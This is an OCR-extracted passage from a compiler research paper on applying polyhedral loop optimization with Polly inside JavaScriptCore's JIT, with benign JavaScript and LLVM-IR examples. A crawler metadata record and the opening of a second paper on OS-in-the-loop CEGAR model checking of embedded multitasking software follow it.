entry point and one exit point. In the context of code generated by a JavaScript engine, this requirement is not met, because of the handling of speculation. For each speculation check, the engine inserts a jump back to the previous layer as shown previously in Figure 5. This jump is implemented in intermediate code representations by blocks jumping to a particular address of the runtime, which is responsible to follow up the execution in the previous layer. Figure 6. Engines speculation leads to non-SESE regions in the control flow graph of the intermediate representation. Figure 6 shows the control flow graph generated by the JavaScriptCore engine for the innermost loop of Figure 1. This diagram clearly reveals a non-SESE nature. The four blocks on the left are jumps to the previous layer of the engine, which make this loop nest non conform to a SESE region. As stated in Section 2.2, these checks are required to ensure that the speculations made by the engine on past profiling results are still valid. In this particular example, the checks ensure that the code does not perform an access outside the bounds of the array, that it accesses an element of the array that has been already allocated, i.e., not a hole, and that the result of the integer operations fit on 32 bits. This 32 bits size has been chosen by the engine when generating native code, because all the profiled values were fitting on 32 bits. 3.1.2 Detection Of Affine Accesses To Arrays As described in the previous sections, JavaScript arrays are complex objects. They can be extended and are not typed. One array can store various types of data simultaneously in its cells. Nevertheless, for an array of primitive types without holes, JavaScript engines will use contiguous memory. The successful detection of affine accesses to these contiguous arrays of primitive types strongly depends on the structure of the code that is generated by the JavaScript engine. This structure must comply with a code shape that can be successfully parsed by polyhedral tools. Section 4.1.2 will show why code generated by JavaScriptCore does not enable detection of affine accesses. 3.1.3 Two Dimensional Arrays And Arrays Of Objects Two-dimensional arrays do not exist in JavaScript. To declare a two-dimensional array, the programmer has to create a first one-dimensional array, and then a second one in each cell of the first array. Because of that lack of two dimensional arrays in the language, JavaScript engines cannot store two-dimensional arrays in contiguous memory. Also, because of the nature of JavaScript arrays that can contain different types of elements, arrays of objects are actually implemented as arrays of pointers. As a consequence, the following expressions both imply two memory accesses: - \( t_{\text{ints}}[i][j]=17; \) - \( t_{\text{objs}}[i].foo=17; \) In both cases, the first memory access is a load from an array. In the first case, the second access is also a load from an array while in the second case it is a load from a property by its name foo. These two loads in generated code, prevent polyhedral tools to represent JavaScript loop nests iterating over such arrays. Indeed, by analyzing the code, it is impossible to know whether the successive loads of the \( i \) integer property, or of the foo named property, are affine functions of loop iterators and constant parameters. The target locations for these memory accesses depend on the location of the objects referred to by arrays \( t_{\text{ints}} \) and \( t_{\text{objs}} \). 3.1.4 Alias Analysis As it is for many compiler transformations, polyhedral optimization requires precise information about pointer aliasing. For a given transformation to be safe, the optimizer must ensure that arrays accessed by different names are actually different arrays. In our example function, there is no such alias issue. Such problems typically occur, as it is the case for compilers of C programs, for example in a matrix multiplication function defined as shown in Figure 7. ```javascript matmul(left, right, res, left_nblines, left_nbcols, right_nblcols) { for (var i=0; i<left_nblines; i++) { for (var j=0; j<left_nbcols; j++) { var idx_left = i * left_nbcols + j; for (var k=0; k<right_nbcols; k++) { var idx_res = i*right_nbcols + k; var idx_right = j*right_nbcols + k; res[idx_res] = res[idx_res] + left[idx_left] * right[idx_right]; } } } } ``` Figure 7. Matrix multiplication function leads to alias analysis issues. The compiler cannot know whether or not the res matrix will alias with the left or with the right one. ### 3.2 Issue 2: Parallel Speculation Failure After an automatic optimization and parallelization of the JavaScript code by a polyhedral optimizer has been performed, several threads run in parallel a single loop nest. Because the engine applies polyhedral optimization in its last layers, optimization is done on speculative code. As a consequence, the parallel code generated includes jumps back to the previous layer in case of speculation failure. At runtime, if such a jump is triggered in one of the threads executing the loop nest, the current state of the system may be wrong. In a sequential execution, the speculation check is always performed before executing the code relying on it. Nothing can go wrong and the dynamism that appears again in the code is handled by the previous layer. In case of parallel execution, several threads may already have performed some wrong computations when a particular thread encounters a speculation failure. All threads must then be stopped and the execution is potentially incorrect. The jump must be handled properly and the loop has to be restarted from the beginning in sequential mode where speculation failure will be properly handled. ### 3.3 Issue 3: Gain Versus Overhead Considering that we are able to perform polyhedral optimization of JavaScript programs inside a JavaScript engine by solving issues 1 and 2 described above, the last challenge is to ensure that it is worth to do so. As for any runtime optimization, the time spent in performing the optimization must be counterbalanced by the reduction of execution time provided by the optimized version of the code. In the context of polyhedral optimization, this gain versus time overhead dilemma is directly related to the performance of tools implementing the optimization. Even if these tools have an exponential complexity in the number of statements of the target loop nest, it has also been shown [11, 19] that they can still be used successfully at runtime. So the question to answer is whether the time required by polyhedral optimization is acceptable in the context of JavaScript engine. This question leads to the question of the configuration of the polyhedral tools used inside a JavaScript engine that may strongly impact optimization time. ### 4 Solutions Proposals We now propose solutions to the challenges described in the previous section. Our proposal is to integrate polyhedral optimization in the last layer of JavaScriptCore, the FTL JIT. At this stage, all JavaScript dynamism has been removed. Also, as described in Section 4.3, integrating polyhedral optimization in the last layer helps in answering issue 3 about gain versus overhead. Moreover, because this step relies on LLVM1, our engine can leverage its mature polyhedral framework called Polly [7], Polly first builds a polyhedral representation of the LLVM-IR. Then some polyhedral transformations are performed on the polyhedral representation. Finally a new version of the LLVM-IR is generated back from the optimized polyhedral representation. ### 4.1 Solution To Issue 1: SCoPs Detection As stated in Section 3.1, the LLVM code of a loop nest generated by JavaScriptCore must be in a SESE region and must form a SCoP to be optimized with polyhedral tools such as Polly. #### 4.1.1 SESE Regions The solution to this problem is related to the solution of parallel speculation failure described in Section 4.2. The main idea is to remove all terminal blocks that jump back in the previous layer leading to non SESE regions. We can do this because if such a block is executed during the parallel execution, we need to re-execute again the whole loop. As a consequence, the generated parallel code is semantically correct only if no such terminal block is executed. More precisely, our solution proposal is as follows: 1Starting from version 2.12, JavaScriptCore is no more using LLVM but a custom low level intermediate representation along with a custom backend called B3. The solutions proposed in this section are nevertheless all applicable to this custom representation excepted the one for the issue of detecting affine accesses to arrays. 1. Remove all terminal blocks that jump back in the previous layer; 2. Insert metadata information for each instruction that can trigger a jump back in the previous layer, along with information about the condition of the jump. These instructions are the branching instructions at the bottom of each basic block shown in Figure 6; 3. Apply Polly transformations on this simplified SESE version of the code; 4. Using the metadata information, insert back after Polly transformations the blocks jumping back to the previous layer. Section 4.2 presents the detailed content of these blocks. This solution allows to apply Polly optimization while still properly detecting engines speculation failures. ### 4.1.2 Detection Of Affine Accesses To Arrays In JavaScriptCore, for an access such as \(t[[\text{index}]]=17;\) where \(t\) is an array of numbers being all 32 bits integers, JavaScriptCore originally generated the code in Figure 8. First, the offset into the array is computed. The index is multiplied by the size of one element in the array. This size is always 64 bits even for an array of 32 bits integers. This is due to the way the engine internally represents objects and primitive types through a technique called NaN boxing\(^3\). The second step is to add the integer value of the pointer on the array’s base and this offset. Since LLVM is a typed IR, the conversion from integer to pointer is done by the \text{inttoptr} instruction. Finally the store is performed. All these steps are complex from a compiler point of view and are hard to track for a tool like Polly. ``` %offset = shl i64 %index, 3 %cell_as_int = add i64 %base_as_int, %offset %cell_ptr = inttoptr i64 %cell_as_int to i64* store i64 %boxed_17, i64* %cell_ptr ``` **Figure 8.** Original LLVM-IR generated by JavaScriptCore for a write in an array of integers. To expose array accesses in a way handled by Polly, our engine replaces these instructions performing pointers arithmetic by the \text{getelementptr} instruction that takes a variable number of parameters. The first one is the type of the array that allows LLVM to know the size of each element with optionally the number of elements. The second one is the accessed array, i.e., a pointer whose type must be conformed to the type described by the first parameter. The following parameters, whose number depends on the number of dimensions of the array, indicate which element is targeted. ``` %base_ptr = inttoptr i64 %base_as_int to [1000 x i64]* %cell_ptr = getelementptr [1000 x i64], [1000 x i64]* %base_ptr, i32 0, i32 %index store i64 %value, i64* %cell_ptr ``` **Figure 9.** Enhanced LLVM-IR for a write in an array of integers allowing Polly to compute affine functions. ### 4.1.3 Two Dimensional Arrays And Arrays Of Objects We currently do not support optimization of loop nests including accesses to two dimensional arrays and arrays of objects. We focus on single dimension arrays of primitive types. Regarding two dimensional arrays of primitive types, this is not a strong concern because JavaScript programmers are used to avoid them and polyhedral tools are capable of recovering dimensions \([8, 11]\). JavaScript programmers already linearize arrays because JavaScript engines are far more efficient with single dimension arrays leading to a single memory load compared to multi dimensional ones as described in Section 3.1.3. Our example function in Figure 1 and the \text{matmul} function in Figure 7 show examples of two dimensional arrays that have been linearized by the programmer. A possible solution to handle two dimensional arrays and arrays of objects would be to modify the memory allocator to force them to be contiguous. This would require either a new construct in the language, or new analyses during profiling ensuring that the engine can reallocate the array in a contiguous way. That would also imply to modify the garbage collector to maintain this property even if the arrays are copied in another location of the heap. --- \(^3\)See the LLVM documentation to understand why there is an additional 0 parameter before the index one https://llvm.org/docs/GetElementPtr.html# what-is-the-first-index-of-the-gep-instruction. An other possible solution consists in studying how static analyses developed for other languages [21] without native multi dimensional arrays could be applied to JavaScript. 4.1.4 Alias Analysis In the context of JavaScriptCore, the alias problem is already mitigated by custom analyses. The main idea already implemented in the engine is type-based analysis relying on the JavaScript objects type hierarchy. In the LLVM-IR code generated by the engine, the object oriented nature of JavaScript has been removed. This is a requirement, since LLVM-IR has no such high level concepts. Nevertheless, because LLVM is not only used to compile low level languages such as C but also object oriented languages, mainly C++, the LLVM-IR provides mechanisms to allow specifying high level typing information. This is done through a particular type of metadata information. This metadata specifies both a type hierarchy in the form of a tree and the type being accessed by each store and each load instruction. Based on this information, LLVM provides alias analyses that can ensure that two memory operations will not access the same address if they access different branches of the type tree. The alias analysis problem is also mitigated by runtime solutions proposed recently [1] and implemented in Polly. The idea is to compute at compile time, required conditions ensuring that pointer based accesses will not alias. Two versions of the code guarded by a check implementing these conditions are then generated. 4.2 Solution To Issue 2 : Parallel Speculation Failure To bypass this problem we are currently investigating two solutions. The first one proposed recently in [17] leverages so called idempotent regions, and the second one uses rollbacks and checkpoints. An idempotent code region [3] is a region that can be interrupted in the middle of its execution and then re-executed from the beginning while still providing the same result. In other words, the region does not modify its inputs. A matrix multiplication producing a resulting array is an example of an idempotent region. Exploiting this property, a JavaScript polyhedral optimizer would only handle idempotent loops to be able to re-execute them with the correct sequential non speculative layer. This solution is simple and has only a small cost consisting in detecting idempotent regions. On the other hand, not all loops can be parallelized with this solution. The rollback solution implies to make a checkpoint of the memory state before starting parallel execution of a loop. When a speculation failure is triggered, the memory state is first restored from the checkpoint. Then, as in the previous solution, the execution starts again with the correct sequential non speculative layer. In our polyhedral context, the cost of saving the memory state to create the checkpoint could be greatly reduced. Relying on proposals of speculative just-in-time polyhedral optimizers [10], we could exploit the affine memory accesses functions to only save the part of the memory which is known to be updated by the loop nest. The main difference with existing work is that the speculation does not concern the polyhedral nature of the loop, but the removal of JavaScript dynamism. Nevertheless, the solution of only saving what would be modified is the same. For both solutions, when a speculation failure is triggered in one of the parallel thread, our engine must jump to a custom handler. This handler stops all threads and re-executes the loop from the beginning using the non speculative sequential layer. For the rollback based solution, the custom handler must also restore the memory state. 4.3 Solution To Issue 3 : Gain Versus Overhead Our proposal first relies on the layered architecture of the JavaScript engine to ensure that spending time in polyhedral optimization is acceptable. JavaScriptCore already has a configurable cost model, which is based on the number of bytecode instructions executed by a function and on the number of invocations. This model ensures that functions optimized by the FTL JIT layer are functions where the program spends most of its execution time. Secondly, relying on Polly, our proposal also leverage another cost model. Polyhedral optimization, even in a static context, must not be applied blindly because in some cases it may hurt performance instead of improving it. As a consequence, Polly includes its own cost model which checks some conditions on the loop nest before optimizing it. Thus, Polly will not even try to optimize the LLVM-IR code generated by our JavaScript engine if it believes that it will not benefit from polyhedral optimization. Last, integrating a state-of-the-art JavaScript engine such as JavaScriptCore allows us to benefit from the parallel compilation mechanisms that are already at work. In JavaScriptCore, the generation of the LLVM-IR and the compilation of this code representation to native code is already achieved by a parallel thread. As a consequence, the additional time spent by Polly to perform polyhedral optimization only delays the time when the optimized native code is ready for execution. 5 Prototype Implementation Our implementation is a modified version of JavaScriptCore including the solutions proposed in Section 4 and including the run of Polly passes in the FTL JIT layer. The implementation regarding non SESE region and parallel speculation failure as described in Section 4.1.1 and in Section 4.2 is not yet completed. Nevertheless, as described in the next section, this baseline prototype allows us to assess the validity of our approach, at least on carefully chosen examples. We also modified Polly for different purposes. First, we added the support of the int to ptr instruction that caused our matmul function to be rejected by Polly SCoP detection. pass. This instruction is widely used by the engine to create LLVM-IR pointers from constant locations known by the FTL JIT compiler. We also added the support of sext and trunc instructions in Polly arrays delinearization algorithm. These instructions, previously not handled by the algorithm, are widely used by JavaScriptCore. This is related to the NaN boxing trick used by the runtime to internally store JavaScript objects and primitive types. Both of them are represented by a 64 bits value where the first bits indicate the type. For 32 bits integers, a trunc instruction is required to remove these first bits to get the effective 32 bits value. 6 Experimental Results To assess the validity of the proposed solutions, we now review preliminary results obtained with the matrix multiplication function shown in Figure 7. This function satisfies the requirement of our implementation handling only single dimension arrays of primitive types as stated in Section 4.1.3. The matrices provided as parameters are single dimension arrays which size is the number of elements in the matrix. We ran the following experiments on a desktop machine with an Intel Xeon W3520 processor with four physical cores and hyperthreading disabled. The machine is running Linux 4.4.0 and we used LLVM and Polly version 4.0.0. Thanks to these modifications both on the LLVM-IR generated by JavaScriptCore and on Polly, Polly is able to handle the loop of the matrix multiplication function. We run Polly with only the --parallel option. Figure 10 shows that after optimization, as reported in a pseudo code fashion by Polly, the matrix multiplication loop has been made parallel and tiled. Regarding aliasing issues, Figure 10 shows that JavaScript type based alias analysis has not been effective because Polly generates a runtime test guarding the execution of the parallel version of the code. Because the three matrices provided as parameters to the matmul have the same type, i.e., arrays, it is impossible, looking at their type only, to ensure that they will not alias. The content of the alias checks also reveals that Polly was able to recover the two dimensional nature of the memory accesses in the three matrices, internally called Mem5, Mem6 and Mem7 by Polly. Because our prototype implementation is not yet complete regarding the handling of speculation failure as stated in Section 5, we must ensure that no such failure can happen in our evaluation. To that end, we use input matrices guaranteeing that the matmul function always write inside the bounds of the result matrix, that the result matrix does not contain any hole and that integer operations never overflow. To fairly evaluate our version of JavaScriptCore including polyhedral optimization where blocks handling speculation failure have been removed but not re-introduced, we created a modified version of the classic JavaScriptCore where these blocks are also removed. 9 Figure 10. Optimized code generated by Polly for the matrix multiply function in Figure 7. Tiling and parallelization have been performed and a runtime check is required for aliasing issues. <table> <thead> <tr> <th>Size of left matrix</th> <th>Execution time without Polly (s)</th> <th>Execution time with Polly (s)</th> <th>Speedup</th> </tr> </thead> <tbody> <tr> <td>50x3000</td> <td>0.08</td> <td>0.06</td> <td>1.33</td> </tr> <tr> <td>500x3000</td> <td>0.85</td> <td>0.22</td> <td>3.86</td> </tr> <tr> <td>2000x3000</td> <td>3.3</td> <td>0.87</td> <td>3.79</td> </tr> </tbody> </table> Figure 11. Speedups resulting from polyhedral optimization for the matmul function with different matrices size. From these results, it is clear that the benefit of performing polyhedral optimization depends on the amount of computation performed by the code. Nevertheless, as soon as matrices are large enough, the polyhedral optimization leads to a speedup which is almost the number of threads. In this benchmark, because our engine performs polyhedral optimization in parallel of the first execution of the function, the additional compile time required by Polly is hidden. Said differently, it is far longer to execute the function with the LLINT, the Baseline JIT and the DFG JIT layers than compiling the function with the FTL JIT. 7 Related work We now review existing research works that recently addressed the parallel execution of JavaScript programs. River Trail [9] is an extension of the language allowing the programmer to indicate to the JavaScript engine where parallelism can be exploited. It mainly provides an application programming interface allowing to express data parallelism. This is done through the addition of a new special JavaScript type called parallel array on which the programmer can apply parallel operations. River trail can be seen has a kind of map reduce framework for JavaScript. Compared to the goal pursued by the ongoing work presented in this paper, programs source code must be changed to be used with River Trail, and parallelization is not automatic. More recently, additions towards concurrency in JavaScript have been introduced in the language specifications [4]. The main novelty is the capability to perform concurrent accesses to the new SharedArrayBuffer type. The role of threads is played by Web Workers in the browser environment. This feature is already supported by JavaScriptengines and the authors of JavaScriptCore started recently to investigate how the thread concept could be added to JavaScript [18]. As River Trail and compared to our proposal, these extensions propose new constructs in the language and do not address automatic parallelization. Recently, Thread Level Speculation (TLS) systems have been proposed in the context of JavaScript implementations. Martinsen et al. [13] proposed to parallelize the execution of different JavaScript functions by integrating standard TLS mechanisms within the just-in-time compilation layer of Google’s V8. Compared to our proposal, they cannot exploit loop level parallelism because they only execute different functions in parallel. TLS at loop level has also been proposed [14]. Compared to us, this work adds a non-negligible speculation overhead. In addition to the JavaScript speculation that must be handled by any JavaScript engine, such systems must also dynamically check that the memory accesses performed in parallel by the different threads do not break the sequential semantics of the program. Finally, the closest work to our proposal, is also an extension of a JavaScript engine for automatic loop parallelization [17]. Our proposal is an extension of this work which only focused on so-called DOALL loops. A DOALL loop does not exhibit any dependency between its iterations. Using the polyhedral model, thanks to its precise representation of loop dependencies, our goal is to parallelize more loops and perform complex optimizing loop transformations. 8 Conclusion We have presented the challenges and solutions to make polyhedral optimization work on JavaScript programs. We integrated our proposal in the last layer of the JavaScriptCore engine which uses LLVM to generate efficient native code. We have modified the JavaScript engine to add more information about loop nests and we integrated Polly to produce optimized parallel code. Our preliminary results demonstrate that polyhedral optimization could be beneficial in the context of JavaScript programs. We now need to complete the implementation of the mechanism handling parallel speculation failure. This development is a large amount of work in the context of a production engine such as JavaScriptCore. Its performance comes at the price of a very large code base containing a lot of corner cases. We also need to perform solid benchmarking experiments to confirm with numbers, at least on some standard benchmarks and applications, that polyhedral transformations are effective in a JavaScript engine. Looking at the benchmarks and applications from previous studies [14, 17], we are confident that polyhedral optimization will be beneficial. The techniques presented in this paper are specific to the JavaScript language. Other dynamic languages like Python or Ruby are not direct targets of this work. Nevertheless, we believe that it could be very interesting to study polyhedral opportunities also for these languages. Regarding the perspective opened by this work, we believe that it could be very interesting and challenging to merge polyhedral speculation as proposed in static languages [11] with JavaScript speculation. This polyhedral speculation concerns the memory accesses performed by loop nests that cannot be statically defined as SCOps. At runtime, thanks to memory profiling, the loop nests conform to SCOps can be optimized by polyhedral tools. In the context of JavaScript, we want to study how to merge memory accesses profiling in the first layer of the engine with the JavaScript profiling mechanisms already at work. From this memory profiling information, the JavaScript engine would construct memory accesses models. Finally, these models would be used in the last layers to perform polyhedral optimization on code that cannot be identified as SCOps by tools like Polly or to perform other parallelization transformations. References
{"Source-Url": "https://manuelselva.github.io/docs/papers/2018-01-impact/Manuel-Selva-jspoly-Paper-impact-2018.pdf", "len_cl100k_base": 9069, "olmocr-version": "0.1.53", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 35798, "total-output-tokens": 11400, "length": "2e13", "weborganizer": {"__label__adult": 0.00036072731018066406, "__label__art_design": 0.00027060508728027344, "__label__crime_law": 0.0002386569976806641, "__label__education_jobs": 0.0003066062927246094, "__label__entertainment": 6.109476089477539e-05, "__label__fashion_beauty": 0.00014531612396240234, "__label__finance_business": 0.00017917156219482422, "__label__food_dining": 0.0003445148468017578, "__label__games": 0.0005369186401367188, "__label__hardware": 0.0010585784912109375, "__label__health": 0.00037026405334472656, "__label__history": 0.00023281574249267575, "__label__home_hobbies": 6.306171417236328e-05, "__label__industrial": 0.0003333091735839844, "__label__literature": 0.0001863241195678711, "__label__politics": 0.00021946430206298828, "__label__religion": 0.00044798851013183594, "__label__science_tech": 0.01129913330078125, "__label__social_life": 5.161762237548828e-05, "__label__software": 0.004528045654296875, "__label__software_dev": 0.97802734375, "__label__sports_fitness": 0.0002944469451904297, "__label__transportation": 0.0004305839538574219, "__label__travel": 0.0001995563507080078}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 50452, 0.03408]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 50452, 0.4918]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 50452, 0.90181]], "google_gemma-3-12b-it_contains_pii": [[0, 4477, false], [4477, 9485, null], [9485, 12087, null], [12087, 16963, null], [16963, 20814, null], [20814, 25921, null], [25921, 30135, null], [30135, 35970, null], [35970, 39716, null], [39716, 45358, null], [45358, 50452, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4477, true], [4477, 9485, null], [9485, 12087, null], [12087, 16963, null], [16963, 20814, null], [20814, 25921, null], [25921, 30135, null], [30135, 35970, null], [35970, 39716, null], [39716, 45358, null], [45358, 50452, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 50452, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 50452, null]], "pdf_page_numbers": [[0, 4477, 1], [4477, 9485, 2], [9485, 12087, 3], [12087, 16963, 4], [16963, 20814, 5], [20814, 25921, 6], [25921, 30135, 7], [30135, 35970, 8], [35970, 39716, 9], [39716, 45358, 10], [45358, 50452, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 50452, 0.02294]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
ab7a3f35963ece11bb5ec1b621d05dd76a752f35
Model checking embedded control software using OS-in-the-loop CEGAR Dongwoo Kim School of Computer Science and Engineering Kyungpook National University Daegu, South Korea dkw9242@gmail.com Yunja Choi School of Computer Science and Engineering Kyungpook National University Daegu, South Korea yuchoi76@knu.ac.kr Abstract—Verification of multitasking embedded software requires taking into account its underlying operating system w.r.t. its scheduling policy and handling of task priorities in order to achieve a higher degree of accuracy. However, such comprehensive verification of multitasking embedded software together with its underlying operating system is very costly and impractical. To reduce the verification cost while achieving the desired accuracy, we propose a variant of CEGAR, named OiL-CEGAR (OS-in-the-Loop Counterexample-Guided Abstraction Refinement), where a composition of a formal OS model and an abstracted application program is used for comprehensive verification and is successively refined using the counterexamples generated from the composition model. The refinement process utilizes the scheduling information in the counterexample, which acts as a mini-OS to check the executability of the counterexample trace on the concrete program. Our experiments using a prototype implementation of OiL-CEGAR show that OiL-CEGAR greatly improves the accuracy and efficiency of property checking in this domain. It automatically removed all false alarms and accomplished property checking within an average of 476 seconds over a set of multitasking programs, whereas model checking using existing approaches over the same set of programs either showed an accuracy of under 11.1% or was unable to finish the verification due to timeout. Index Terms—CEGAR, embedded OS, multitasking I. INTRODUCTION An embedded system consists of a number of devices controlled by software programs. Such control software is typically multitasking and runs on top of an operating system designed for controlling small-scale embedded devices, such as sensors, actuators, brake pedals, engines, etc., which are mostly used in safety-critical domains. The control program, in particular, is tightly coupled with its underlying operating system as they are compiled together to generate a piece of embedded control software, and the behavior of the control program can therefore not be analyzed accurately without taking into account the behavior of the operating system. However, research and practice in this domain have focused either on the verification of the control program or on the verification of the operating system, independent of each other [1]–[8], due to the huge verification cost when trying to comprehensively verify application software together with the implementation of the operating system. Verifying embedded control software without considering the underlying OS often results in a high rate of false alarms, as such verification is highly likely to refute a given verification property based on incorrect execution sequences among tasks. For example, a low-priority task may be preempted by higher-priority tasks in a control program. Such behavior is determined by the system configuration and the scheduling policy of the OS used. Most existing approaches that do not consider the underlying OS use sound abstraction of the scheduling behavior such as non-deterministic scheduling of tasks [1], [4]. Our experiments showed that these approaches had an accuracy of only 11.1%, verifying only two of the 18 applications within the time bound. This work sets out to find an efficient verification method for multitasking embedded control software that reduces false alarm rates as well as verification cost. To this end, we adapted the CEGAR approach [9], [10], where abstraction-verification-refinement iterations are successively performed until a real problem is identified or the given property is verified, to the domain of embedded software by taking the operating system into the loop. Our approach, named OiL-CEGAR (OS-in-the-Loop CEGAR) is unique in that (1) it utilizes models of the operating system, which are assumed to be correct w.r.t. the requirements specifications, and (2) we take advantage of two different types of model checkers, a symbolic model checker, NuSMV [11], for property checking and the C code model checker CBMC [1] for code-based false alarm identification. For a given property, OiL-CEGAR first tries to verify the property on the composition of the operating system model and the application model abstracted from the program source code. If the property is refuted, the model checker NuSMV generates a counterexample trace including task scheduling information and the control flow of the application program. This task scheduling information is used to construct a mini-OS for the application source code so that CBMC can be used to check the executability of the given trace in the concrete application program. If the trace is executable, then the counterexample is a real alarm. Otherwise, the composition of the OS model and the application model is refined using the trace so that the next iteration of OiL-CEGAR can be performed. OiL-CEGAR is efficient in identifying real property violations with moderate verification cost, even though more complexity is introduced by taking the OS model into ac- A multitasking program consists of a set of tasks. Each task has its own priority so that a task with higher priority is scheduled earlier than tasks with lower priority. It is also possible for a task with lower priority to run prior to a task with higher priority if it accesses a critical section by voluntarily waiting for an event. A running task may be in a waiting state by voluntarily waiting for an event. An application program interacts with its underlying operating system through API functions provided by the OS. Figure 1 shows an example of the embedded application program that will be used throughout this paper. Given the system configuration, the two tasks are expected to be executed as shown in the lower part of the figure; The autostart task t1 runs first and activates task t2, which has higher priority. Task t2 preempts t1, runs to set wait_sw to ON, and goes to the waiting state by calling WaitEvent(e1), giving another execution round to task t1. t1 calls SetEvent for task t2, as the branch condition in line 04 evaluates to true, which preempts t1 again and wakes t2. After t2 terminates, t1 activates t2 again, but t2 terminates immediately as wait_sw evaluates to ON. II. BACKGROUND A multitasking application program consists of a set of tasks. Each task has its own priority so that a task with higher priority is scheduled earlier than tasks with lower priority. It is also possible for a task with lower priority to run prior to a task with higher priority if it accesses a critical section by occupying resources. A running task may be in a waiting state by voluntarily waiting for an event. An application program interacts with its underlying operating system through API functions provided by the OS. Figure 1 shows an example of the embedded application program that will be used throughout this paper. Given the system configuration, the two tasks are expected to be executed as shown in the lower part of the figure; The autostart task t1 runs first and activates task t2, which has higher priority. Task t2 preempts t1, runs to set wait_sw to ON, and goes to the waiting state by calling WaitEvent(e1), giving another execution round to task t1. t1 calls SetEvent for task t2, as the branch condition in line 04 evaluates to true, which preempts t1 again and wakes t2. After t2 terminates, t1 activates t2 again, but t2 terminates immediately as wait_sw evaluates to ON. A. Verification of embedded control software The behavior of an embedded application program is determined by its system configuration, task logic, and OS behavior, which typically produce a unique deterministic trace unless an interrupt occurs. If we abstract the operating system, e.g., by using non-deterministic scheduling, we need to consider multiple execution traces for the same program as context switching may occur at any instruction of each task. For example, there can be up to \(15 \times 5 = 3,003\) execution sequences to check for the program in Figure 1 if we assume that a context switch may occur in every line of the program. It is extremely expensive to perform comprehensive verification in this case, both in terms of performing model checking for property checking and in terms of identifying false alarms produced by incorrect task execution sequences. We note that even software-level dynamic testing of an embedded control program is difficult because embedded software requires a specific hardware platform, platform-specific library functions, and other peripherals such as sensors and event generators. Software-level testing often requires specific simulation environments [12], which are not always available in the development process. B. Counterexample-guided abstraction refinement CEGAR [9], [10] is an effective verification method for alleviating verification complexity through successive abstraction-verification-refinement iterations. Figure 2 shows the overall process of CEGAR. It starts with an initial abstraction of a given application \(\mathcal{M}\). If the abstract model is verified for a given property \(\varphi\), then we can safely conclude that the concrete application is verified, as the model is a sound abstraction of the application. Otherwise, the counterexample \(\tau\) generated from checking \(\varphi\) is tested on the concrete application to determine whether it is an actual execution trace, as it may be the case that the trace is possible only on the abstract model (false alarm). If it is executable on a concrete application, it shows a property violation of the system (true alarm). Otherwise, \(\tau\) is used to refine \(\mathcal{M}\), which is verified w.r.t. \(\varphi\) in the next iteration. This process is repeated until a real alarm is identified or until the property is verified. CEGAR has been successfully applied in various application domains [4], [13]–[18]. However, it has not been clear whether it can be effectively applied to multitasking embedded software, taking into account the OS behavior. C. Formal models of embedded operating system A number of approaches for formally modeling and verifying embedded operating systems have been proposed. Most notably, the construction of sel4 [19] is based on successive refinements of a formal OS model written in Haskell [20], which is thoroughly verified for correctness w.r.t. the functional requirements of a real-time embedded operating system. The other notable example is the formal modeling of embedded operating systems that are compliant with the OSEK/VDX international standard [21]. Approaches include, for example, modeling in Promela [22], CSP [8], NuSMV [23], UPPAAL [24] and the K-framework [25]. OiL-CEGAR is independent of formal models and modeling approaches, but this work adopts the pattern-based automatic model construction approach suggested in [23] to facilitate automation of the OiL-CEGAR process. Figure 3 shows the internal structure of the embedded operating system used in [23], modeled by referring to the OSEK/VDX international standard. An OS kernel consists of a set of kernel objects, which can be Tasks, Events, Resources, or Alarms. A task (or thread) is the basic building block of embedded software. An embedded OS maintains the internal states of each task which typically consists of {running, ready, waiting, suspended} as in the OSEK/VDX OS, Zephyr [26], FreRTOS [27], etc., with minor variations. The internal state of each task changes according to the task management and scheduling mechanism in the OS kernel, which is triggered by requests from the application program through API function calls. A task may set a periodic alarm to activate another task or to set an event. An external event triggers a corresponding ISR (Interrupt Service Routine), which may call API functions. The OSEK OS adopts priority-based FIFO scheduling with dynamically changing ceiling priorities for resource allocation in order to avoid the priority-inversion problem. Reference [23] formally modeled the behavior of each kernel object as a parameterized state machine (called patterns) and defined an OS model as a synchronized parallel composition of multiple kernel objects whose types and numbers are determined by the system configuration. In addition, an OS generator was defined as a function from configuration vectors to formal OS models. This approach is implemented as a prototype tool for automated model construction by composing the formal patterns specified in the input language of NuSMV [11] or Spin [28]. The generated OS models are validated through property verification using a set of functional requirements identified from the OSEK/VDX international standard. For more details on the OSEK OS and pattern-based OS model construction, please refer to [23]. Our work utilized the prototype tool with a minor extension to the OS model. To enable a focused discussion of OiL-CEGAR, however, throughout this paper an OS model is assumed to be a black-box component where transitions among internal states of tasks are the only externally visible behaviors. III. BASIC DEFINITIONS This section defines the terminologies required to explain OiL-CEGAR. Definition 1. A control flow graph (CFG) for a task \( T_{CFG} = (N, E, n_0, n_t) \) is a directed graph where \( N \) is a set of statement blocks, \( n_0 \in N \) is a unique entry block, \( n_t \in N \) is a unique exit block, and \( E : N \rightarrow N \) is a set of directed control flow edges. A statement block is a sequence of statements. It is also a unit of atomic execution. Each statement block consists of the maximal sequence of blocks, \( \{ \text{no 